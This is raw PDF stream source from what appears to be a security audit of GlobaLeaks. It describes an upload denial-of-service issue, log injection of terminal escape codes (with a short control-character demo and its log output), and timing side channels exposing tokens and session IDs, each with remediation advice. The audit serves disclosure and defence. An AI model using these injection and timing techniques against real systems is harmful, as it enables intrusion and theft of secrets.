BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 681.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.090651 Tw 12 TL /F1 10 Tf 0 0 0 rg (To mitigate this issue, ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators should check the file upload folder for files that) Tj T* 0 Tw (are not associated with any Tip. This could be made easier by releasing a script that does this.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 663.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 633.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.765697 Tw 12 TL /F1 10 Tf 0 0 0 rg (The remediation for ) Tj 0 0 .501961 rg (Issue A. Plaintext is Written To Disk Before Encryption ) Tj 0 0 0 rg (would additionally protect) Tj T* 0 Tw (against the "framing" impact of this vulnerability.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 591.0236 cm
q
BT 1 0 0 1 0 26 Tm .496235 Tw 12 TL /F1 10 Tf 0 0 0 rg (Adding logic to ) Tj /F3 10 Tf (unlink\(\) ) Tj /F1 10 Tf (the uploaded files when the Whistleblower fails to finish submitting the tip will) Tj T* 0 Tw .61284 Tw (greatly mitigate this Denial of Service vector, although attackers with sufficient bandwidth, or edge cases) Tj T* 0 Tw (which bypass the call to ) Tj /F3 10 Tf (unlink\(\) ) Tj /F1 10 Tf (may thwart this remediation strategy.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 561.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .713672 Tw (An alternative remediation is to only upload the files when the Tip is in the state which the cleanup logic) Tj T* 0 Tw (already handles.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 531.0236 cm
q
BT 1 0 0 1 0 14 Tm .789982 Tw 12 TL /F1 10 Tf 0 0 0 rg (We also recommend showing the terms-of-service agreement to the Whistleblower ) Tj /F4 10 Tf (before ) Tj /F1 10 Tf (they have the) Tj T* 0 Tw (opportunity to upload any files.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 513.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Confirmed.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 507.0236 cm
Q
q
1 0 0 1 62.69291 507.0236 cm
Q
q
1 0 0 1 62.69291 321.8236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 170.2 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 158.2 cm
q
BT 1 0 0 1 0 14 Tm .278555 Tw 12 TL /F4 10 Tf 0 0 0 rg (Update 2014-02-06 ) Tj /F1 10 Tf (- This issue is related to ) Tj 0 0 .501961 rg (GlobaLeaks ticket 782 ) Tj 0 0 0 rg (and the ) Tj 0 0 .501961 rg (GlobaLeaks Submission) Tj T* 0 Tw (Flood Resiliency Project ) Tj 0 0 0 rg (document.) Tj T* ET
Q
Q
q
1 0 0 1 23 128.2 cm
q
BT 1 0 0 1 0 14 Tm .18229 Tw 12 TL /F1 10 Tf 0 0 0 rg (The latter document does not distinguish between file uploads and "submissions", which we interpret) Tj T* 0 Tw (to mean ) Tj /F4 10 Tf (tips) Tj /F1 10 Tf (. The following comes from that document:) Tj T* ET
Q
Q
q
1 0 0 1 23 35 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 445.6898 84 re B*
Q
q
0 0 0 rg
BT 1 0 0 1 0 62 Tm /F3 10 Tf 12 TL (There are 3 different way that can be done to achieve a flood attack:) Tj T*  T* (  1. Creating many new submissions \(regardless of the amount of) Tj T* (     fields/files attached\)) Tj T* (  2. Adding a lot of new comments on existing submissions) Tj T* (  3. Uploading a lot of new files on existing submissions) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .409988 Tw (The flood attack vector 3 is worded as if files may only be uploaded within the context of an existing) Tj T* 0 Tw (submission. This issue demonstrates uploads may occur outside of submissions.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 315.8236 cm
Q
q
1 0 0 1 62.69291 303.8236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #828) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 303.8236 cm
Q
q
1 0 0 1 62.69291 303.8236 cm
Q
 
endstream
endobj
% 'R365': class PDFStream 
365 0 obj
% page stream
<< /Length 6946 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue I. User Input Written to Logs) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-02-07) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 702.0236 cm
q
BT 1 0 0 1 0 14 Tm .756098 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (User input is written to log files. This might let attackers create fake log entries or log entries) Tj T* 0 Tw (that contain terminal escape codes.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 672.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.751235 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (The attacker can create fake log entries and can insert terminal escape codes into the logs,) Tj T* 0 Tw (which could be used to execute code when the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrator views the logs.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 642.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.438555 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node must be configured to log ) Tj /F4 10 Tf (info ) Tj /F1 10 Tf (or ) Tj /F4 10 Tf (debug ) Tj /F1 10 Tf (messages. We) Tj T* 0 Tw (believe the default level, ) Tj /F3 10 Tf (CRITICAL) Tj /F1 10 Tf (, is safe, but we are not certain. This is mentioned in ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 612.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.534651 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (There are several log messages that contain user input. The attacker only has to provide) Tj T* 0 Tw (input that will be passed to one of these log messages.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 594.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 576.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The following code can be found in ) Tj /F3 10 Tf (globaleaks/handlers/files.py) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 570.0236 cm
Q
q
1 0 0 1 62.69291 545.5478 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
q
.971265 0 0 .971265 0 0 cm
q
1 0 0 1 6.6 6.795265 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 462 24 re B*
Q
q
BT 1 0 0 1 0 2 Tm 12 TL /F3 10 Tf 0 0 0 rg (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ("=) Tj (>) Tj ( Recorded new InternalFile ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg ( \() Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg (\)") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (\() Tj (original_fname) Tj (,) Tj ( ) Tj (cksum) Tj (\)\)) Tj T* ET
Q
Q
Q
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 545.5478 cm
Q
q
1 0 0 1 62.69291 527.5478 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (There are many more log messages formatting external input with ) Tj /F3 10 Tf (%s) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 485.5478 cm
q
BT 1 0 0 1 0 26 Tm 11.42886 Tw 12 TL /F1 10 Tf 0 0 0 rg (The generated log message goes through ) Tj /F3 10 Tf (twisted.python.log) Tj /F1 10 Tf (, a complex and) Tj T* 0 Tw 5.038538 Tw (not-obviously-fully-documented module. Experimentation shows control characters getting through) Tj T* 0 Tw (unescaped:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 479.5478 cm
Q
q
1 0 0 1 62.69291 442.3478 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 448.6898 36 re B*
Q
q
BT 1 0 0 1 0 14 Tm 12 TL /F3 10 Tf 0 0 0 rg (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ('') Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (join) Tj (\() Tj 0 .501961 0 rg (map) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (chr) Tj 0 0 0 rg (,) Tj ( ) Tj 0 .501961 0 rg (range) Tj 0 0 0 rg (\() Tj .4 .4 .4 rg (32) Tj 0 0 0 rg (\)\)\)\)) Tj  T* (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ('') Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (join) Tj (\() Tj 0 .501961 0 rg (map) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (chr) Tj 0 0 0 rg (,) Tj ( ) Tj 0 .501961 0 rg (range) Tj 0 0 0 rg (\() Tj .4 .4 .4 rg (127) Tj 0 0 0 rg (,) Tj ( ) Tj .4 .4 .4 rg (140) Tj 0 0 0 rg (\)\)\)\)) Tj T* ET
Q
Q
Q
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 442.3478 cm
Q
q
1 0 0 1 62.69291 400.3478 cm
q
BT 1 0 0 1 0 26 Tm .217209 Tw 12 TL /F1 10 Tf 0 0 0 rg (This produces in the log file \(as rendered by Emacs; for example, ) Tj /F4 10 Tf (^[ ) Tj /F1 10 Tf (means a literal ESC character, ASCII) Tj T* 0 Tw 1.349984 Tw (27, used in terminal-escape exploits; the octal escape codes are also from Emacs, standing for binary) Tj T* 0 Tw (characters in the log file\):) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 331.1478 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 468.6898 60 re B*
Q
q
0 0 0 rg
BT 1 0 0 1 0 38 Tm /F3 10 Tf 12 TL (2014-02-14 15:23:50+0100 [-] [D] ^@^A^B^C^D^E^F^G^H) Tj T* (2014-02-14 15:23:50+0100 [-] ^K^L^M^N^O^P^Q^R^S^T^U^V^W^X^Y^Z^[^\\^]^^^_) Tj T* (2014-02-14 15:24:26+0100 [-] [D]) Tj T* (^?\\200\\201\\202\\203\\204\\205\\206\\207\\210\\211\\212\\213) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 299.1478 cm
q
BT 1 0 0 1 0 14 Tm 2.900697 Tw 12 TL /F1 10 Tf 0 0 0 rg (To exploit a default configuration, an attacker must inject special characters into a ) Tj /F3 10 Tf (log.msg ) Tj /F1 10 Tf (call.) Tj T* 0 Tw /F3 10 Tf (log.err ) Tj /F1 10 Tf (appears to escape these characters.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 281.1478 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Mitigation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 251.1478 cm
q
BT 1 0 0 1 0 14 Tm .27528 Tw 12 TL /F1 10 Tf 0 0 0 rg (This issue is mitigated as long as ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node administrators do not use a non-default log level \(the) Tj T* 0 Tw (default is ) Tj /F3 10 Tf (CRITICAL) Tj /F1 10 Tf (\).) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 233.1478 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 203.1478 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .015697 Tw (All messages should be logged in a way that safely and unambiguously encodes non-printable characters.) Tj T* 0 Tw (All logging paths should go through the same, safe sanitizer.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 173.1478 cm
q
BT 1 0 0 1 0 14 Tm .258876 Tw 12 TL /F1 10 Tf 0 0 0 rg (Here are two examples of the sort of encoding we mean: one in use ) Tj 0 0 .501961 rg (in Tahoe-LAFS) Tj 0 0 0 rg (, and a self-contained) Tj T* 0 Tw (function we have not used, and only cursorily tested:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 173.1478 cm
Q
 
endstream
endobj
% 'R366': class PDFStream 
366 0 obj
% page stream
<< /Length 5160 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 408.6576 cm
q
q
.822636 0 0 .822636 0 0 cm
q
1 0 0 1 6.6 8.022988 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 570 432 re B*
Q
q
BT 1 0 0 1 0 410 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (import) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf 0 0 1 rg (codecs) Tj /F3 10 Tf 0 0 0 rg  T*  T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (debug) Tj 0 0 0 rg (\() Tj (logmsg) Tj (\):) Tj  T* (    ) Tj /F7 10 Tf .729412 .129412 .129412 rg (""") Tj T* (    I'll encode logmsg into a safe representation \(containing only) Tj T* (    printable ASCII characters\) and pass it to log.debug\(\) \(which in) Tj T* (    this example stands in for some underlying logging module that) Tj T* (    doesn't further process the string\).) Tj T*  T* (    As an aside, it can be helpful to hold all strings of human-language) Tj T* (    characters in Python unicode objects, never in Python \(Python v2\) string) Tj T* (    objects \(which are renamed to "bytes" objects in Python v3\). However,) Tj T* (    that is not necessary to use this.) Tj T* (    """) Tj /F3 10 Tf 0 0 0 rg  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj (log_encode) Tj (\() Tj (logmsg) Tj (\)\)) Tj  T*  T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (log_encode) Tj 0 0 0 rg (\() Tj (logmsg) Tj (\):) Tj  T* (    ) Tj /F7 10 Tf .729412 .129412 .129412 rg (""") Tj T* (    I encode logmsg \(a str or unicode\) as printable ASCII. Each case) Tj T* (    gets a distinct prefix, so that people differentiate a unicode) Tj T* (    from a utf-8-encoded-byte-string or binary gunk that would) Tj T* (    otherwise result in the same final output.) Tj T* (    """) Tj /F3 10 Tf 0 0 0 rg  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (isinstance) Tj 0 0 0 rg (\() Tj (logmsg) Tj (,) Tj ( ) Tj 0 .501961 0 rg (unicode) Tj 0 0 0 rg (\):) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg (': ') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj (codecs) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (encode) Tj (\() Tj (logmsg) Tj (,) Tj ( ) Tj .729412 .129412 .129412 rg ('unicode_escape') Tj 0 0 0 rg (\)) Tj  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (elif) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (isinstance) Tj 0 0 0 rg (\() Tj (logmsg) Tj (,) Tj ( ) Tj 0 .501961 0 rg (str) Tj 0 0 0 rg (\):) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (try) Tj /F3 10 Tf 0 0 0 rg (:) Tj  T* (            ) Tj (unicodelogmsg) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (logmsg) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (decode) Tj (\() Tj .729412 .129412 .129412 rg ('utf-8') Tj 0 0 0 rg (\)) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (except) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .823529 .254902 .227451 rg (UnicodeDecodeError) Tj /F3 10 Tf 0 0 0 rg (:) Tj  T* (            ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('binary: ') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj (codecs) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (encode) Tj (\() Tj (logmsg) Tj (,) Tj ( ) Tj .729412 .129412 .129412 rg ('string_escape') Tj 0 0 0 rg (\)) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (else) Tj /F3 10 Tf 0 0 0 rg (:) Tj  T* (            ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('utf-8: ') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj (codecs) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (encode) Tj (\() Tj (unicodelogmsg) Tj (,) Tj ( ) Tj .729412 .129412 .129412 rg ('unicode_escape') Tj 0 0 0 rg (\)) Tj  T* (    ) Tj /F6 10 Tf 0 .501961 0 rg (else) Tj /F3 10 Tf 0 0 0 rg (:) Tj  T* (        ) Tj /F6 10 Tf 0 .501961 0 rg (raise) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .823529 .254902 .227451 rg (Exception) Tj /F3 10 Tf 0 0 0 rg (\() Tj .729412 .129412 .129412 rg ("I accept only a unicode object or a string, not a ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg ( object like ) Tj /F6 10 Tf .733333 .4 .533333 rg (%r) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg  T* (                        ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (\() Tj 0 .501961 0 rg (type) Tj 0 0 0 rg (\() Tj (logmsg) Tj (\),) Tj ( ) Tj 0 .501961 0 rg (repr) Tj 0 0 0 rg (\() Tj (logmsg) Tj (\),\)\)) Tj T* ET
Q
Q
Q
Q
Q
q
1 0 0 1 62.69291 388.6576 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Partially confirmed, but needs more analysis.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 382.6576 cm
Q
q
1 0 0 1 62.69291 382.6576 cm
Q
q
1 0 0 1 62.69291 370.6576 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (This issue is tracked in ) Tj 0 0 .501961 rg (GlobaLeaks Issue Ticket #829) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 370.6576 cm
Q
q
1 0 0 1 62.69291 370.6576 cm
Q
 
endstream
endobj
% 'R367': class PDFStream 
367 0 obj
% page stream
<< /Length 5002 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 735.0236 cm
q
BT 1 0 0 1 0 17.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* (Attacks) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 717.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 699.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (Information about various secrets leaks through the side channel of timing of operations.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 669.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.923555 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (The attacker can extract secrets by measuring the response time of the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (server.) Tj T* 0 Tw (Some candidate secrets include file download tokens, XSRF tokens, session IDs, and account names.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 639.0236 cm
q
BT 1 0 0 1 0 14 Tm .405868 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (The attacker needs to be able to measure the time it takes the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (server to) Tj T* 0 Tw (respond to their requests.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 585.0236 cm
q
BT 1 0 0 1 0 38 Tm .237984 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (The exploitability of a timing side channel depends on the resolution and accuracy with which) Tj T* 0 Tw .015984 Tw (the attacker can measure response times. The latency introduced by the Tor network should make attacks) Tj T* 0 Tw 1.122619 Tw (harder, but it is not a defense because the noise is additive: it can be countered with more samples to) Tj T* 0 Tw (infer the signal.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 555.0236 cm
q
BT 1 0 0 1 0 14 Tm 3.524597 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection. The specific issues listed below have not been) Tj T* 0 Tw (confirmed by experiment, but we list them anyway to err on the side of caution.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 525.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.779147 Tw 12 TL /F1 10 Tf 0 0 0 rg (See ) Tj 0 0 .501961 rg (Appendix D. Side-Channel Attack Proof of Concept ) Tj 0 0 0 rg (for an informal proof-of-concept side-channel) Tj T* 0 Tw (attack on ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 507.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 453.0236 cm
q
BT 1 0 0 1 0 38 Tm 1.866651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Operations whose time varies depending on the value of a secret thereby leak information about the) Tj T* 0 Tw 2.015318 Tw (secret. An attacker may be able to integrate the piecemeal information about the secret revealed by) Tj T* 0 Tw 1.053318 Tw (iterated requests to reveal the secret itself. See the paper ) Tj 0 0 .501961 rg (Exposing Private Information by Timing Web) Tj T* 0 Tw (Applications) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 435.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The specific vulnerabilities of this class that we've noticed are listed as sub-issues following this one.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 417.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 375.0236 cm
q
BT 1 0 0 1 0 26 Tm 1.720651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Timing attacks can be made slightly harder by requiring access to be through Tor. ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node) Tj T* 0 Tw 1.496651 Tw (administrators may be able to detect side channel attacks by noticing an unusual amount of repetitive) Tj T* 0 Tw (requests.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 357.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 327.0236 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.643059 Tw (To eliminate side channels, eliminate varying-work operations that depend on a secret. These include) Tj T* 0 Tw (branches, array indices, and database lookups.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 297.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.664597 Tw 12 TL /F1 10 Tf 0 0 0 rg (To compare strings in constant time, use a vetted function such as ) Tj /F3 10 Tf (constant_time_compare ) Tj /F1 10 Tf (from) Tj T* 0 Tw 0 0 .501961 rg (Tahoe-LAFS) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 267.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.312651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Remediation of data-structure side channels \(e.g. for the session token\) is an actively evolving area of) Tj T* 0 Tw (research; we have some ideas, left for future work.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 237.0236 cm
q
BT 1 0 0 1 0 14 Tm 1.354692 Tw 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (The description of this vulnerability is incomplete. There is no proof of concept, but we do not) Tj T* 0 Tw (intend to make one.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 237.0236 cm
Q
 
endstream
endobj
% 'R368': class PDFStream 
368 0 obj
% page stream
<< /Length 3327 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 750.0236 cm
q
BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.1: Timing Leak of File Download Token) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 732.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 714.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (File download tokens can leak via the timing side-channel.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 696.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker may be able to download submitted files.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 666.0236 cm
q
BT 1 0 0 1 0 14 Tm 2.84152 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (See ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* 0 Tw (Attacks) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 648.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 630.0236 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 612.0236 cm
q
0 0 0 rg
